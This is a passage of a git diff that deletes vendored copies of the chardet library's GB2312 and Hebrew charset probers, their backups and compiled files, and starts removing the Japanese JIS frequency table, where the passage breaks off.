a/chardet/chardet/gb2312prober.py +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .mbcharsetprober import MultiByteCharSetProber -from .codingstatemachine import CodingStateMachine -from .chardistribution import GB2312DistributionAnalysis -from .mbcssm import GB2312SMModel - -class GB2312Prober(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(GB2312SMModel) - self._mDistributionAnalyzer = GB2312DistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "GB2312" diff --git a/chardet/chardet/gb2312prober.py.bak b/chardet/chardet/gb2312prober.py.bak deleted file mode 100644 index 91eb392..0000000 --- a/chardet/chardet/gb2312prober.py.bak +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import GB2312DistributionAnalysis -from mbcssm import GB2312SMModel - -class GB2312Prober(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(GB2312SMModel) - self._mDistributionAnalyzer = GB2312DistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "GB2312" diff --git a/chardet/chardet/gb2312prober.pyc b/chardet/chardet/gb2312prober.pyc deleted file mode 100644 index c200bb9..0000000 Binary files a/chardet/chardet/gb2312prober.pyc and /dev/null differ diff --git a/chardet/chardet/hebrewprober.py b/chardet/chardet/hebrewprober.py deleted file mode 100644 index 42bf98d..0000000 --- a/chardet/chardet/hebrewprober.py +++ /dev/null @@ -1,269 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Shy Shalom -# Portions created by the Initial Developer are Copyright (C) 2005 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .charsetprober import CharSetProber -from . import constants - -# This prober doesn't actually recognize a language or a charset. -# It is a helper prober for the use of the Hebrew model probers - -### General ideas of the Hebrew charset recognition ### -# -# Four main charsets exist in Hebrew: -# "ISO-8859-8" - Visual Hebrew -# "windows-1255" - Logical Hebrew -# "ISO-8859-8-I" - Logical Hebrew -# "x-mac-hebrew" - ?? Logical Hebrew ?? -# -# Both "ISO" charsets use a completely identical set of code points, whereas -# "windows-1255" and "x-mac-hebrew" are two different proper supersets of -# these code points. windows-1255 defines additional characters in the range -# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific -# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6. -# x-mac-hebrew defines similar additional code points but with a different -# mapping. -# -# As far as an average Hebrew text with no diacritics is concerned, all four -# charsets are identical with respect to code points. Meaning that for the -# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters -# (including final letters). -# -# The dominant difference between these charsets is their directionality. -# "Visual" directionality means that the text is ordered as if the renderer is -# not aware of a BIDI rendering algorithm. The renderer sees the text and -# draws it from left to right. The text itself when ordered naturally is read -# backwards. A buffer of Visual Hebrew generally looks like so: -# "[last word of first line spelled backwards] [whole line ordered backwards -# and spelled backwards] [first word of first line spelled backwards] -# [end of line] [last word of second line] ... etc' " -# adding punctuation marks, numbers and English text to visual text is -# naturally also "visual" and from left to right. -# -# "Logical" directionality means the text is ordered "naturally" according to -# the order it is read. It is the responsibility of the renderer to display -# the text from right to left. A BIDI algorithm is used to place general -# punctuation marks, numbers and English text in the text. -# -# Texts in x-mac-hebrew are almost impossible to find on the Internet. From -# what little evidence I could find, it seems that its general directionality -# is Logical. -# -# To sum up all of the above, the Hebrew probing mechanism knows about two -# charsets: -# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are -# backwards while line order is natural. For charset recognition purposes -# the line order is unimportant (In fact, for this implementation, even -# word order is unimportant). -# Logical Hebrew - "windows-1255" - normal, naturally ordered text. -# -# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be -# specifically identified. -# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew -# that contain special punctuation marks or diacritics is displayed with -# some unconverted characters showing as question marks. This problem might -# be corrected using another model prober for x-mac-hebrew. Due to the fact -# that x-mac-hebrew texts are so rare, writing another model prober isn't -# worth the effort and performance hit. -# -#### The Prober #### -# -# The prober is divided between two SBCharSetProbers and a HebrewProber, -# all of which are managed, created, fed data, inquired and deleted by the -# SBCSGroupProber. The two SBCharSetProbers identify that the text is in -# fact some kind of Hebrew, Logical or Visual. The final decision about which -# one is it is made by the HebrewProber by combining final-letter scores -# with the scores of the two SBCharSetProbers to produce a final answer. -# -# The SBCSGroupProber is responsible for stripping the original text of HTML -# tags, English characters, numbers, low-ASCII punctuation characters, spaces -# and new lines. It reduces any sequence of such characters to a single space. -# The buffer fed to each prober in the SBCS group prober is pure text in -# high-ASCII. -# The two SBCharSetProbers (model probers) share the same language model: -# Win1255Model. -# The first SBCharSetProber uses the model normally as any other -# SBCharSetProber does, to recognize windows-1255, upon which this model was -# built. The second SBCharSetProber is told to make the pair-of-letter -# lookup in the language model backwards. This in practice exactly simulates -# a visual Hebrew model using the windows-1255 logical Hebrew model. -# -# The HebrewProber is not using any language model. All it does is look for -# final-letter evidence suggesting the text is either logical Hebrew or visual -# Hebrew. Disjointed from the model probers, the results of the HebrewProber -# alone are meaningless. HebrewProber always returns 0.00 as confidence -# since it never identifies a charset by itself. Instead, the pointer to the -# HebrewProber is passed to the model probers as a helper "Name Prober". -# When the Group prober receives a positive identification from any prober, -# it asks for the name of the charset identified. If the prober queried is a -# Hebrew model prober, the model prober forwards the call to the -# HebrewProber to make the final decision. In the HebrewProber, the -# decision is made according to the final-letters scores maintained and Both -# model probers scores. The answer is returned in the form of the name of the -# charset identified, either "windows-1255" or "ISO-8859-8". - -# windows-1255 / ISO-8859-8 code points of interest -FINAL_KAF = '\xea' -NORMAL_KAF = '\xeb' -FINAL_MEM = '\xed' -NORMAL_MEM = '\xee' -FINAL_NUN = '\xef' -NORMAL_NUN = '\xf0' -FINAL_PE = '\xf3' -NORMAL_PE = '\xf4' -FINAL_TSADI = '\xf5' -NORMAL_TSADI = '\xf6' - -# Minimum Visual vs Logical final letter score difference. -# If the difference is below this, don't rely solely on the final letter score distance. -MIN_FINAL_CHAR_DISTANCE = 5 - -# Minimum Visual vs Logical model score difference. -# If the difference is below this, don't rely at all on the model score distance. -MIN_MODEL_DISTANCE = 0.01 - -VISUAL_HEBREW_NAME = "ISO-8859-8" -LOGICAL_HEBREW_NAME = "windows-1255" - -class HebrewProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mLogicalProber = None - self._mVisualProber = None - self.reset() - - def reset(self): - self._mFinalCharLogicalScore = 0 - self._mFinalCharVisualScore = 0 - # The two last characters seen in the previous buffer, - # mPrev and mBeforePrev are initialized to space in order to simulate a word - # delimiter at the beginning of the data - self._mPrev = ' ' - self._mBeforePrev = ' ' - # These probers are owned by the group prober. - - def set_model_probers(self, logicalProber, visualProber): - self._mLogicalProber = logicalProber - self._mVisualProber = visualProber - - def is_final(self, c): - return c in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI] - - def is_non_final(self, c): - # The normal Tsadi is not a good Non-Final letter due to words like - # 'lechotet' (to chat) containing an apostrophe after the tsadi. This - # apostrophe is converted to a space in FilterWithoutEnglishLetters causing - # the Non-Final tsadi to appear at an end of a word even though this is not - # the case in the original text. - # The letters Pe and Kaf rarely display a related behavior of not being a - # good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' for - # example legally end with a Non-Final Pe or Kaf. However, the benefit of - # these letters as Non-Final letters outweighs the damage since these words - # are quite rare. - return c in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE] - - def feed(self, aBuf): - # Final letter analysis for logical-visual decision. - # Look for evidence that the received buffer is either logical Hebrew or - # visual Hebrew. - # The following cases are checked: - # 1) A word longer than 1 letter, ending with a final letter. This is an - # indication that the text is laid out "naturally" since the final letter - # really appears at the end. +1 for logical score. - # 2) A word longer than 1 letter, ending with a Non-Final letter. In normal - # Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, should not end with - # the Non-Final form of that letter. Exceptions to this rule are mentioned - # above in isNonFinal(). This is an indication that the text is laid out - # backwards. +1 for visual score - # 3) A word longer than 1 letter, starting with a final letter. Final letters - # should not appear at the beginning of a word. This is an indication that - # the text is laid out backwards. +1 for visual score. - # - # The visual score and logical score are accumulated throughout the text and - # are finally checked against each other in GetCharSetName(). - # No checking for final letters in the middle of words is done since that case - # is not an indication for either Logical or Visual text. - # - # We automatically filter out all 7-bit characters (replace them with spaces) - # so the word boundary detection works properly. [MAP] - - if self.get_state() == constants.eNotMe: - # Both model probers say it's not them. No reason to continue. - return constants.eNotMe - - aBuf = self.filter_high_bit_only(aBuf) - - for cur in aBuf: - if cur == ' ': - # We stand on a space - a word just ended - if self._mBeforePrev != ' ': - # next-to-last char was not a space so self._mPrev is not a 1 letter word - if self.is_final(self._mPrev): - # case (1) [-2:not space][-1:final letter][cur:space] - self._mFinalCharLogicalScore += 1 - elif self.is_non_final(self._mPrev): - # case (2) [-2:not space][-1:Non-Final letter][cur:space] - self._mFinalCharVisualScore += 1 - else: - # Not standing on a space - if (self._mBeforePrev == ' ') and (self.is_final(self._mPrev)) and (cur != ' '): - # case (3) [-2:space][-1:final letter][cur:not space] - self._mFinalCharVisualScore += 1 - self._mBeforePrev = self._mPrev - self._mPrev = cur - - # Forever detecting, till the end or until both model probers return eNotMe (handled above) - return constants.eDetecting - - def get_charset_name(self): - # Make the decision: is it Logical or Visual? - # If the final letter score distance is dominant enough, rely on it. - finalsub = self._mFinalCharLogicalScore - self._mFinalCharVisualScore - if finalsub >= MIN_FINAL_CHAR_DISTANCE: - return LOGICAL_HEBREW_NAME - if finalsub <= -MIN_FINAL_CHAR_DISTANCE: - return VISUAL_HEBREW_NAME - - # It's not dominant enough, try to rely on the model scores instead. - modelsub = self._mLogicalProber.get_confidence() - self._mVisualProber.get_confidence() - if modelsub > MIN_MODEL_DISTANCE: - return LOGICAL_HEBREW_NAME - if modelsub < -MIN_MODEL_DISTANCE: - return VISUAL_HEBREW_NAME - - # Still no good, back to final letter distance, maybe it'll save the day. - if finalsub < 0.0: - return VISUAL_HEBREW_NAME - - # (finalsub > 0 - Logical) or (don't know what to do) default to Logical. - return LOGICAL_HEBREW_NAME - - def get_state(self): - # Remain active as long as any of the model probers are active. - if (self._mLogicalProber.get_state() == constants.eNotMe) and \ - (self._mVisualProber.get_state() == constants.eNotMe): - return constants.eNotMe - return constants.eDetecting diff --git a/chardet/chardet/hebrewprober.py.bak b/chardet/chardet/hebrewprober.py.bak deleted file mode 100644 index a2b1eaa..0000000 --- a/chardet/chardet/hebrewprober.py.bak +++ /dev/null @@ -1,269 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Shy Shalom -# Portions created by the Initial Developer are Copyright (C) 2005 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from charsetprober import CharSetProber -import constants - -# This prober doesn't actually recognize a language or a charset. -# It is a helper prober for the use of the Hebrew model probers - -### General ideas of the Hebrew charset recognition ### -# -# Four main charsets exist in Hebrew: -# "ISO-8859-8" - Visual Hebrew -# "windows-1255" - Logical Hebrew -# "ISO-8859-8-I" - Logical Hebrew -# "x-mac-hebrew" - ?? Logical Hebrew ?? -# -# Both "ISO" charsets use a completely identical set of code points, whereas -# "windows-1255" and "x-mac-hebrew" are two different proper supersets of -# these code points. windows-1255 defines additional characters in the range -# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific -# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6. -# x-mac-hebrew defines similar additional code points but with a different -# mapping. -# -# As far as an average Hebrew text with no diacritics is concerned, all four -# charsets are identical with respect to code points. Meaning that for the -# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters -# (including final letters). -# -# The dominant difference between these charsets is their directionality. -# "Visual" directionality means that the text is ordered as if the renderer is -# not aware of a BIDI rendering algorithm. The renderer sees the text and -# draws it from left to right. The text itself when ordered naturally is read -# backwards. A buffer of Visual Hebrew generally looks like so: -# "[last word of first line spelled backwards] [whole line ordered backwards -# and spelled backwards] [first word of first line spelled backwards] -# [end of line] [last word of second line] ... etc' " -# adding punctuation marks, numbers and English text to visual text is -# naturally also "visual" and from left to right. -# -# "Logical" directionality means the text is ordered "naturally" according to -# the order it is read. It is the responsibility of the renderer to display -# the text from right to left. A BIDI algorithm is used to place general -# punctuation marks, numbers and English text in the text. -# -# Texts in x-mac-hebrew are almost impossible to find on the Internet. From -# what little evidence I could find, it seems that its general directionality -# is Logical. -# -# To sum up all of the above, the Hebrew probing mechanism knows about two -# charsets: -# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are -# backwards while line order is natural. For charset recognition purposes -# the line order is unimportant (In fact, for this implementation, even -# word order is unimportant). -# Logical Hebrew - "windows-1255" - normal, naturally ordered text. -# -# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be -# specifically identified. -# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew -# that contain special punctuation marks or diacritics is displayed with -# some unconverted characters showing as question marks. This problem might -# be corrected using another model prober for x-mac-hebrew. Due to the fact -# that x-mac-hebrew texts are so rare, writing another model prober isn't -# worth the effort and performance hit. -# -#### The Prober #### -# -# The prober is divided between two SBCharSetProbers and a HebrewProber, -# all of which are managed, created, fed data, inquired and deleted by the -# SBCSGroupProber. The two SBCharSetProbers identify that the text is in -# fact some kind of Hebrew, Logical or Visual. The final decision about which -# one is it is made by the HebrewProber by combining final-letter scores -# with the scores of the two SBCharSetProbers to produce a final answer. -# -# The SBCSGroupProber is responsible for stripping the original text of HTML -# tags, English characters, numbers, low-ASCII punctuation characters, spaces -# and new lines. It reduces any sequence of such characters to a single space. -# The buffer fed to each prober in the SBCS group prober is pure text in -# high-ASCII. -# The two SBCharSetProbers (model probers) share the same language model: -# Win1255Model. -# The first SBCharSetProber uses the model normally as any other -# SBCharSetProber does, to recognize windows-1255, upon which this model was -# built. The second SBCharSetProber is told to make the pair-of-letter -# lookup in the language model backwards. This in practice exactly simulates -# a visual Hebrew model using the windows-1255 logical Hebrew model. -# -# The HebrewProber is not using any language model. All it does is look for -# final-letter evidence suggesting the text is either logical Hebrew or visual -# Hebrew. Disjointed from the model probers, the results of the HebrewProber -# alone are meaningless. HebrewProber always returns 0.00 as confidence -# since it never identifies a charset by itself. Instead, the pointer to the -# HebrewProber is passed to the model probers as a helper "Name Prober". -# When the Group prober receives a positive identification from any prober, -# it asks for the name of the charset identified. If the prober queried is a -# Hebrew model prober, the model prober forwards the call to the -# HebrewProber to make the final decision. In the HebrewProber, the -# decision is made according to the final-letters scores maintained and Both -# model probers scores. The answer is returned in the form of the name of the -# charset identified, either "windows-1255" or "ISO-8859-8". - -# windows-1255 / ISO-8859-8 code points of interest -FINAL_KAF = '\xea' -NORMAL_KAF = '\xeb' -FINAL_MEM = '\xed' -NORMAL_MEM = '\xee' -FINAL_NUN = '\xef' -NORMAL_NUN = '\xf0' -FINAL_PE = '\xf3' -NORMAL_PE = '\xf4' -FINAL_TSADI = '\xf5' -NORMAL_TSADI = '\xf6' - -# Minimum Visual vs Logical final letter score difference. -# If the difference is below this, don't rely solely on the final letter score distance. -MIN_FINAL_CHAR_DISTANCE = 5 - -# Minimum Visual vs Logical model score difference. -# If the difference is below this, don't rely at all on the model score distance. -MIN_MODEL_DISTANCE = 0.01 - -VISUAL_HEBREW_NAME = "ISO-8859-8" -LOGICAL_HEBREW_NAME = "windows-1255" - -class HebrewProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mLogicalProber = None - self._mVisualProber = None - self.reset() - - def reset(self): - self._mFinalCharLogicalScore = 0 - self._mFinalCharVisualScore = 0 - # The two last characters seen in the previous buffer, - # mPrev and mBeforePrev are initialized to space in order to simulate a word - # delimiter at the beginning of the data - self._mPrev = ' ' - self._mBeforePrev = ' ' - # These probers are owned by the group prober. - - def set_model_probers(self, logicalProber, visualProber): - self._mLogicalProber = logicalProber - self._mVisualProber = visualProber - - def is_final(self, c): - return c in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI] - - def is_non_final(self, c): - # The normal Tsadi is not a good Non-Final letter due to words like - # 'lechotet' (to chat) containing an apostrophe after the tsadi. This - # apostrophe is converted to a space in FilterWithoutEnglishLetters causing - # the Non-Final tsadi to appear at an end of a word even though this is not - # the case in the original text. - # The letters Pe and Kaf rarely display a related behavior of not being a - # good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' for - # example legally end with a Non-Final Pe or Kaf. However, the benefit of - # these letters as Non-Final letters outweighs the damage since these words - # are quite rare. - return c in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE] - - def feed(self, aBuf): - # Final letter analysis for logical-visual decision. - # Look for evidence that the received buffer is either logical Hebrew or - # visual Hebrew. - # The following cases are checked: - # 1) A word longer than 1 letter, ending with a final letter. This is an - # indication that the text is laid out "naturally" since the final letter - # really appears at the end. +1 for logical score. - # 2) A word longer than 1 letter, ending with a Non-Final letter. In normal - # Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, should not end with - # the Non-Final form of that letter. Exceptions to this rule are mentioned - # above in isNonFinal(). This is an indication that the text is laid out - # backwards. +1 for visual score - # 3) A word longer than 1 letter, starting with a final letter. Final letters - # should not appear at the beginning of a word. This is an indication that - # the text is laid out backwards. +1 for visual score. - # - # The visual score and logical score are accumulated throughout the text and - # are finally checked against each other in GetCharSetName(). - # No checking for final letters in the middle of words is done since that case - # is not an indication for either Logical or Visual text. - # - # We automatically filter out all 7-bit characters (replace them with spaces) - # so the word boundary detection works properly. [MAP] - - if self.get_state() == constants.eNotMe: - # Both model probers say it's not them. No reason to continue. - return constants.eNotMe - - aBuf = self.filter_high_bit_only(aBuf) - - for cur in aBuf: - if cur == ' ': - # We stand on a space - a word just ended - if self._mBeforePrev != ' ': - # next-to-last char was not a space so self._mPrev is not a 1 letter word - if self.is_final(self._mPrev): - # case (1) [-2:not space][-1:final letter][cur:space] - self._mFinalCharLogicalScore += 1 - elif self.is_non_final(self._mPrev): - # case (2) [-2:not space][-1:Non-Final letter][cur:space] - self._mFinalCharVisualScore += 1 - else: - # Not standing on a space - if (self._mBeforePrev == ' ') and (self.is_final(self._mPrev)) and (cur != ' '): - # case (3) [-2:space][-1:final letter][cur:not space] - self._mFinalCharVisualScore += 1 - self._mBeforePrev = self._mPrev - self._mPrev = cur - - # Forever detecting, till the end or until both model probers return eNotMe (handled above) - return constants.eDetecting - - def get_charset_name(self): - # Make the decision: is it Logical or Visual? - # If the final letter score distance is dominant enough, rely on it. - finalsub = self._mFinalCharLogicalScore - self._mFinalCharVisualScore - if finalsub >= MIN_FINAL_CHAR_DISTANCE: - return LOGICAL_HEBREW_NAME - if finalsub <= -MIN_FINAL_CHAR_DISTANCE: - return VISUAL_HEBREW_NAME - - # It's not dominant enough, try to rely on the model scores instead. - modelsub = self._mLogicalProber.get_confidence() - self._mVisualProber.get_confidence() - if modelsub > MIN_MODEL_DISTANCE: - return LOGICAL_HEBREW_NAME - if modelsub < -MIN_MODEL_DISTANCE: - return VISUAL_HEBREW_NAME - - # Still no good, back to final letter distance, maybe it'll save the day. - if finalsub < 0.0: - return VISUAL_HEBREW_NAME - - # (finalsub > 0 - Logical) or (don't know what to do) default to Logical. - return LOGICAL_HEBREW_NAME - - def get_state(self): - # Remain active as long as any of the model probers are active. - if (self._mLogicalProber.get_state() == constants.eNotMe) and \ - (self._mVisualProber.get_state() == constants.eNotMe): - return constants.eNotMe - return constants.eDetecting diff --git a/chardet/chardet/hebrewprober.pyc b/chardet/chardet/hebrewprober.pyc deleted file mode 100644 index 5788cf3..0000000 Binary files a/chardet/chardet/hebrewprober.pyc and /dev/null differ diff --git a/chardet/chardet/jisfreq.py b/chardet/chardet/jisfreq.py deleted file mode 100644 index 5fe4a5c..0000000 --- a/chardet/chardet/jisfreq.py +++ /dev/null @@ -1,567 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -# Sampling from about 20M text materials include literature and computer technology -# -# Japanese frequency table, applied to both S-JIS and EUC-JP -# They are sorted in order. - -# 128 --> 0.77094 -# 256 --> 0.85710 -# 512 --> 0.92635 -# 1024 --> 0.97130 -# 2048 --> 0.99431 -# -# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58 -# Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191 -# -# Typical Distribution Ratio, 25% of IDR - -JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0 - -# Char to FreqOrder table , -JIS_TABLE_SIZE = 4368 - -JISCharToFreqOrder = ( \ - 40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16 -3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32 -1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48 -2042,1061,1062, 48, 49, 44, 45, 433, 434,1040,1041, 996, 787,2997,1255,4305, # 64 -2108,4609,1684,1648,5073,5074,5075,5076,5077,5078,3687,5079,4610,5080,3927,3928, # 80 -5081,3296,3432, 290,2285,1471,2187,5082,2580,2825,1303,2140,1739,1445,2691,3375, # 96 -1691,3297,4306,4307,4611, 452,3376,1182,2713,3688,3069,4308,5083,5084,5085,5086, # 112 -5087,5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102, # 128 -5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,4097,5113,5114,5115,5116,5117, # 144 -5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133, # 160 -5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149, # 176 -5150,5151,5152,4612,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164, # 192 -5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,1472, 598, 618, 820,1205, # 208 -1309,1412,1858,1307,1692,5176,5177,5178,5179,5180,5181,5182,1142,1452,1234,1172, # 224 -1875,2043,2149,1793,1382,2973, 925,2404,1067,1241, 960,1377,2935,1491, 919,1217, # 240 -1865,2030,1406,1499,2749,4098,5183,5184,5185,5186,5187,5188,2561,4099,3117,1804, # 256 -2049,3689,4309,3513,1663,5189,3166,3118,3298,1587,1561,3433,5190,3119,1625,2998, # 272 -3299,4613,1766,3690,2786,4614,5191,5192,5193,5194,2161, 26,3377, 2,3929, 20, # 288 -3691, 47,4100, 50, 17, 16, 35, 268, 27, 243, 42, 155, 24, 154, 29, 184, # 304 - 4, 91, 14, 92, 53, 396, 33, 289, 9, 37, 64, 620, 21, 39, 321, 5, # 320 - 12, 11, 52, 13, 3, 208, 138, 0, 7, 60, 526, 141, 151,1069, 181, 275, # 336 -1591, 83, 132,1475, 126, 331, 829, 15, 69, 160, 59, 22, 157, 55,1079, 312, # 352 - 109, 38, 23, 25, 10, 19, 79,5195, 61, 382,1124, 8, 30,5196,5197,5198, # 368 -5199,5200,5201,5202,5203,5204,5205,5206, 89, 62, 74, 34,2416, 112, 139, 196, # 384 - 271, 149, 84, 607, 131, 765, 46, 88, 153, 683, 76, 874, 101, 258, 57, 80, # 400 - 32, 364, 121,1508, 169,1547, 68, 235, 145,2999, 41, 360,3027, 70, 63, 31, # 416 - 43, 259, 262,1383, 99, 533, 194, 66, 93, 846, 217, 192, 56, 106, 58, 565, # 432 - 280, 272, 311, 256, 146, 82, 308, 71, 100, 128, 214, 655, 110, 261, 104,1140, # 448 - 54, 51, 36, 87, 67,3070, 185,2618,2936,2020, 28,1066,2390,2059,5207,5208, # 464 -5209,5210,5211,5212,5213,5214,5215,5216,4615,5217,5218,5219,5220,5221,5222,5223, # 480 -5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,3514,5237,5238, # 496 -5239,5240,5241,5242,5243,5244,2297,2031,4616,4310,3692,5245,3071,5246,3598,5247, # 512 -4617,3231,3515,5248,4101,4311,4618,3808,4312,4102,5249,4103,4104,3599,5250,5251, # 528 -5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267, # 544 -5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283, # 560 -5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299, # 576 -5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315, # 592 -5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331, # 608 -5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347, # 624 -5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363, # 640 -5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379, # 656 -5380,5381, 363, 642,2787,2878,2788,2789,2316,3232,2317,3434,2011, 165,1942,3930, # 672 -3931,3932,3933,5382,4619,5383,4620,5384,5385,5386,5387,5388,5389,5390,5391,5392, # 688 -5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408, # 704 -5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424, # 720 -5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440, # 736 -5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456, # 752 -5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472, # 768 -5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488, # 784 